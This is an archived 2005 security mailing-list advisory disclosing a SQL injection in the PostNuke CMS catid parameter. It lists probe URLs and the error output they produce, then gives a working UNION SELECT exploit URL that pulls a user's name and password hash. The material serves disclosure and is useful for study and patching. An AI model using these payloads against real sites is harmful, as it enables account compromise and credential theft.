Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[SECURITYREASON.COM] PostNuke Critical SQL Injection 0.760-RC2=>x cXI

from [Maksymilian Arciemowicz] Network Security [Permanent Link]
Subject: [SECURITYREASON.COM] PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1
Date: 28 Feb 2005 20:11:51 -0000 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1]

Author: cXIb8O3(Maksymilian Arciemowicz)
Date: 15.2.2005
from securityreason.com TEAM

- --- 0.Description ---

PostNuke: The Phoenix Release (0.760-RC2=>x)

PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/


- --- 1. Critical SQL INJECTION ---
This SQL INJECTION is in modules/News/funcs.php in function getArticles(). When 
this function is active(Other Stories), we can add sql querty in varible catid. 

For exemple:

http://[HOST]/[DIR]/index.php?catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the 
manual that corresponds to your MySQL server version for the right syntax to 
use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

http://[HOST]/[DIR]/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the 
manual that corresponds to your MySQL server version for the right syntax to 
use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

http://[HOST]/[DIR]/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the 
manual that corresponds to your MySQL server version for the right syntax to 
use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

etc.

and varible $query is:

- ---------------
SELECT pn__stories.pn_aid AS "aid", pn__stories.pn_bodytext AS "bodytext", 
pn__stories_cat.pn_themeoverride AS "catthemeoverride", pn__stories.pn_catid AS 
"cid", pn__stories_cat.pn_title AS "cattitle", pn__stories.pn_comments AS 
"comments", pn__stories.pn_counter AS "counter", pn__stories.pn_hometext AS 
"hometext", pn__stories.pn_informant AS "informant", pn__stories.pn_notes AS 
"notes", pn__stories.pn_sid AS "sid", pn__stories.pn_themeoverride AS 
"themeoverride", pn__topics.pn_topicid AS "tid", pn__stories.pn_time AS "time", 
pn__stories.pn_title AS "title", pn__topics.pn_topicname AS "topicname", 
pn__topics.pn_topicimage AS "topicimage", pn__topics.pn_topictext AS 
"topictext", pn__topics.pn_counter AS "tcounter", pn__stories.pn_time AS 
"unixtime", pn__stories.pn_withcomm AS "withcomm" FROM pn__stories LEFT JOIN 
pn__stories_cat ON pn__stories.pn_catid = pn__stories_cat.pn_catid LEFT JOIN 
pn__topics ON pn__stories.pn_topic = pn__topics.pn_topicid WHERE 
(pn__stories.pn_language
 ='eng' OR pn__stories.pn_language='') AND pn__stories.pn_catid='cXIb8O3 ORDER 
BY pn__stories.pn_time DESC
- ---------------

Exploit:
This exploit get password from user with id=2. But frist check prefix. 

Step 1.
http://[HOST]/[DIR]/index.php?catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the 
manual that corresponds to your MySQL server version for the right syntax to 
use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

and pn_ is that prefix.

Step 2.
http://[HOST]/[DIR]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE%20pn_uid=2/*
 

- --- 2. How to fix ---

Download the new version of the script or update.

- --- 3. Greets ---

Only for sp3x..

- --- 4.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
SECURITYREASON.COM TEAM

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCI3q4znmvyJCR4zQRAgiQAJ4w/H6sa4jeEgQttYjERpWoIfbscQCglFe4
/6PJBa0Rgiz5/SnDGnGsjZY=
=tr+q
-----END PGP SIGNATURE-----
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [SECURITYREASON.COM] PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1, Maksymilian Arciemowicz <=
Previous by Date:  [SECURITYREASON.COM] PostNuke Critical XSS 0.760-RC2=>x cXIb8O3.2, Maksymilian Arciemowicz
Next by Date:  Re: iDEFENSE Security Advisory 02.28.05: Mozilla Firefox and Mozilla Browser Out Of Memory Heap Corruption Design Error, Miles Beck
Previous by Thread:  [SECURITYREASON.COM] PostNuke Critical XSS 0.760-RC2=>x cXIb8O3.2, Maksymilian Arciemowicz
Next by Thread:  Firefox Software Update, Kai Howells
Indexes:  [Date] [Thread] [Top] [All Lists]